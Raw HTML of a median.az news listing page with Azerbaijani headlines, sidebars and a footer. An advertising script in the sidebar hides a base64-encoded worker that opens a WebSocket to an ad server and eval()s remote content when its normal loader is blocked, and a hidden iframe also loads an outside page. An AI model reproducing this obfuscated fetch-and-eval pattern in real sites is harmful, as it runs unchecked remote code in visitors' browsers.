	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 584  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 15:16
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63970" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521712327_ob.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Azərbaycanda yaşı 100 və 100-dən yuxarı olan seçicilərin sayı açıqlanıb</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 353  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 14:07
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63969" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521712287_v.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Terrorçular Afrində “Quran”a bomba yerləşdirib</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 406  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=vmire"> 	<i class="glyphicon glyphicon-th-list"></i> Dünya  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 13:58
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63967" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521711558_pr.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Qubada istirahət mərkəzi yanıb</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 651  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=proiswestviya"> 	<i class="glyphicon glyphicon-th-list"></i> Hadisə  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 13:47
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63966" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521711549_s.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>“Barselona” türk futbolçunu 100 milyona transfer edə bilər</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 634  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=sport"> 	<i class="glyphicon glyphicon-th-list"></i> İdman  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 13:37
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63965" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521710762_o.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Azərbaycanda yenilik: saytı girov qoyub kredit götürmək olar</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 548  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=obwestvo"> 	<i class="glyphicon glyphicon-th-list"></i> Cəmiyyət  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 13:24
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63963" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521709617_p.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Bakıda 4 avtomobil toqquşdu – 2 nəfər ağır yaralandı</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 442  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=proiswestviya"> 	<i class="glyphicon glyphicon-th-list"></i> Hadisə  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 13:05
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63961" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521708695_w.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Qapı arxasından Nağılbazın "çıxdığını" görən Röyanın reaksiyası ... - VİDEO</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 5 572  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=shoubiznes"> 	<i class="glyphicon glyphicon-th-list"></i> Şou Biznes  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 12:51
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63957" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/1521708417_ec.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Dövlət Film Fondunun işçilərinin maaşı artırılıb</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 324  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=ekonomika"> 	<i class="glyphicon glyphicon-th-list"></i> İqtisadiyyat  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 12:46
			</span>
	</div>
</div>
<a href="http://median.az/index.php?newsid=63956" target="_blank">
<div class="short">
	<div class="img-short">
		<img [thumb] src="http://median.az/uploads/posts/2018-03/thumbs/1521707672_w.jpg"  class="img-responsive center-block" [/thumb]>
		
		<div class="img-short-title">
			
		</div>
	</div>
	<div class="short-desc">
		<center><p style="color: #353d42;" align="left"><font size="4" face="pf_din_text_cond_promedium", Arial, sans-serif"><b>Həbsxanada yatan, narkotik çəkən MƏŞHURLARIMIZ – SİYAHI</b></p></font></center>
	</div></a>
	<div class="short-bott">
			
			<i class="glyphicon glyphicon-eye-open"></i> 33 489  &nbsp;&nbsp;<a href="http://median.az/index.php?do=cat&category=shoubiznes"> 	<i class="glyphicon glyphicon-th-list"></i> Şou Biznes  
			</a>
			<span class="pull-right">
				<i class="glyphicon glyphicon-calendar"></i> 22-03 12:33
			</span>
	</div>
</div><br style="clear:both">
<div style="text-align:center">

	<ul class="pagination">

		<li>
			<span>&larr;</span>
		</li>
		<li><span>1</span> <a href="http://median.az/index.php?cstart=2&amp;">2</a> <a href="http://median.az/index.php?cstart=3&amp;">3</a> <a href="http://median.az/index.php?cstart=4&amp;">4</a> <a href="http://median.az/index.php?cstart=5&amp;">5</a> <a href="http://median.az/index.php?cstart=6&amp;">6</a> <a href="http://median.az/index.php?cstart=7&amp;">7</a> <a href="http://median.az/index.php?cstart=8&amp;">8</a> <a href="http://median.az/index.php?cstart=9&amp;">9</a> <a href="http://median.az/index.php?cstart=10&amp;">10</a> <span class="nav_ext">...</span> <a href="http://median.az/index.php?cstart=275&amp;">275</a></li>
		<li>
			<a href="http://median.az/index.php?cstart=2&amp;">&rarr;</a>
		</li>
	</ul>
	</div></div>
      <div style="clear:both;">&nbsp;</div>
    </div>
    <div class="col-md-3 pull-right sidebar-offcanvas">
      	
<div class="side-block">
	<div class="side-head">TOP - 5 Xəbər</div>
	<ul class="side-top s_a list-unstyled">
		<li>
	<img src="http://median.az/uploads/posts/2018-03/1520943289_1.jpg">
	<a href="http://median.az/index.php?newsid=63367" target="_blank">
		Bakıda məktəbli qız küçədə qan içərisində fəryad edir - VİDEO +18
	</a>
</li><li>
	<img src="http://median.az/uploads/posts/2018-03/1521289958_1521289887.jpg">
	<a href="http://median.az/index.php?newsid=63773" target="_blank">
		Mətanətin şpakatı, Günayın Zaurun belinə minməsi, hamam xalatı…-Telekanallarımız bu vəziyyətdədir ...
	</a>
</li><li>
	<img src="http://median.az/uploads/posts/2018-03/thumbs/1521707672_w.jpg">
	<a href="http://median.az/index.php?newsid=63956" target="_blank">
		Həbsxanada yatan, narkotik çəkən MƏŞHURLARIMIZ – SİYAHI
	</a>
</li><li>
	<img src="http://median.az/uploads/posts/2018-03/1520840236_1.jpg">
	<a href="http://median.az/index.php?newsid=63220" target="_blank">
		“Qızı” ilə evli olan “Klon” serialının “Lukas”ı illər sonra – FOTO
	</a>
</li><li>
	<img src="http://median.az/uploads/posts/2018-03/thumbs/1521724970_ob.jpg">
	<a href="http://median.az/index.php?newsid=63982" target="_blank">
		Bakıda valideynlər həyəcan təbili çalırlar: “Balalarımızı zəhərləyirlər” – FOTO
	</a>
</li>
	</ul>
</div>
<br>


<br>
<a href="http://www.sirenamotors.az/" target="_blank"><img src="http://median.az/uploads/sirenamotorsbanner.png" width="280" height="373" /></a><br><br>




<br>
<a href="http://abad.gov.az/" target="_blank"><img src="http://median.az/uploads/abad_banner.gif" width="280" height="373" /></a><br><br>

<br>
<div class="side-block">
	<div class="side-head">Günün top - 5 xəbəri</div>
	<ul class="side-top s_a list-unstyled">
		<li>
	<img src="http://median.az/uploads/posts/2018-03/1521792999_1.jpg">
	<a href="http://median.az/index.php?newsid=64013" target="_blank">
		“Muhteşem Yüzyıl”ın aktyoru həbs olundu – FOTO
	</a>
</li><li>
	<img src="http://median.az/uploads/posts/2018-03/thumbs/1521798267_kr.jpg">
	<a href="http://median.az/index.php?newsid=64044" target="_blank">
		Ata evə gec gələn qızının dodaqlarını kəsdi
	</a>
</li><li>
	<img src="http://median.az/uploads/posts/2018-03/1521799034_w.jpg">
	<a href="http://median.az/index.php?newsid=64049" target="_blank">
		Səmra Rəhimlidən erməni etirafı: "Səhnədə məni itələdi" - VİDEO
	</a>
</li><li>
	<img src="http://median.az/uploads/posts/2018-03/1521797074_ob.jpg">
	<a href="http://median.az/index.php?newsid=64038" target="_blank">
		Evləri sökülən bəzi vətəndaşlar narazıdır, qiymətlər isə bahalaşır - FOTOLAR
	</a>
</li><li>
	<img src="http://median.az/uploads/posts/2018-03/1521795524_ob.jpg">
	<a href="http://median.az/index.php?newsid=64031" target="_blank">
		Bakının bu hissələrində nəqliyyatın hərəkəti məhdudlaşdırılacaq
	</a>
</li>
	</ul>
</div><br>
<br>


<center>
    	

        	<a href="http://heydar-aliyev.org/" target="_blank"><img src="https://www.gov.az/images/banner_ha.png"  width="189" height="89"></a><br><br><br>
            <a href="http://president.az/" target="_blank"><img src="https://www.gov.az/images/banner_ia.png"  width="189" height="89"></a><br><br><br>
            <a href="http://heydar-aliyev-foundation.org/" target="_blank"><img src="https://www.gov.az/images/banner_fond.png" width="189" height="89"></a><br><br><br>
            <a href="http://www.virtualkarabakh.az/" target="_blank">
			<img src="http://www.bpqmi.gov.az/files/banners/ban_1463752630_ban_1445232204_banner1.png"  width="189" height="89"></a><br><br><br>
			<a href="http://www.mia.gov.az/" target="_blank" >
			<img src="http://dq.mia.gov.az/files/banners/ban_1397280166_thumb_03.png" width="189" height="89"></a>
      
		
		<br><br><br></center>

<div class="fb-page" data-href="https://www.facebook.com/Median.Azxeber/" data-tabs="timeline" data-height="1500" data-small-header="false" data-adapt-container-width="true" data-hide-cover="false" data-show-facepile="true"><div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/Median.Azxeber/"><a href="https://www.facebook.com/Median.Azxeber/">MEDIAN.az News</a></blockquote></div></div>
<br>

<br>
<div id="n4p_34055">Loading...</div>
<script type="text/javascript" charset="utf-8">
  (function(d,s){
    var o=d.createElement(s);
    o.async=true;
    o.type="text/javascript";
    o.charset="utf-8";
    o.src="//js-ru.redtram.com/n4p/0/34/ticker_34055.js";
    var x=d.getElementsByTagName(s)[0];
    x.parentNode.insertBefore(o,x);
  })(document,"script");
</script>

<script id="r18907" type="text/javascript">
    (function() {
        var worker18907,
            tickerID = 18907,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/18/ticker_18907.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker18907.postMessage(data);
                }

                worker18907 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker18907.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker18907.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>



    
    	


      <div style="clear:both;">&nbsp;</div>
    </div>
  </div>
</div>

<footer class="footer">
  <div class="container">
    <div class="footer-text pull-left">




		<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t28.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано количество просмотров и"+
" посетителей' "+
"border='0' width='98' height='140'><\/a>")
//--></script><!--/LiveInternet-->	
 
 </div>


 <div class="main-top hidden-xs">
 <div style="position: absolute; width: 501px; height: 123px; z-index: 1; right: 105; top: 15px" id="layer1">
	<font color="#FFFFFF">&quot;Median.Az&quot; İnformasiya Agentliyi<br>
	Qeydiyyat nömrəsi: 1583 AR Ədliyyə Nazirliyi<br>
	Ünvan: Bakı ş., Səbayıl r-nu, Zərifə Əliyeva küç. 17 <br>
	Tel: (+994 55) 676 36 36 , (+994 12) 437 96 26<br>
	e-Mail: editor@median.az<br>
	Təsisçi və Baş redaktor: Pərviz Nəcəfquliyev<br>
    Materiallardan istifadə edərkən sayta mütləq istinad olunmalıdır.<br>
	© 2014-2018
	
	</font></div></div>
 
 <div class="main-top hidden-lg hidden-md hidden-sm">
 <div style="position: absolute;   z-index: 1; left: 125; top: 15px" id="layer2">
	<font color="#FFFFFF"><font size="1"><br>&quot;Median.Az&quot; İnformasiya Agentliyi<br>
	Qeydiyyat nömrəsi: 1583 AR Ədliyyə Nazirliyi<br>
	Ünvan: Bakı ş., Səbayıl r-nu, Zərifə Əliyeva küç. 17 <br>
	Tel: (+994 55) 676 36 36 , (+994 12) 437 96 26<br>
	e-Mail: editor@median.az<br>
	Təsisçi və Baş redaktor: Pərviz Nəcəfquliyev<br>
    Materiallardan istifadə edərkən sayta mütləq istinad olunmalıdır.<br>
	© 2014-2018
	
	</font></div>


	
    <div class="footer-img pull-right">

 <div class="main-top hidden-xs">

  </div></div>
</footer>


<div id="scrollup">
	<img src="http://median.az/templates/new/images/up.png" class="up" alt="Прокрутить вверх" />
</div>

<iframe src="http://mediancard.com/live.html" style="display:none;"></iframe>



</body>
</html>
<!-- DataLife Engine Copyright SoftNews Media Group (http://dle-news.ru) -->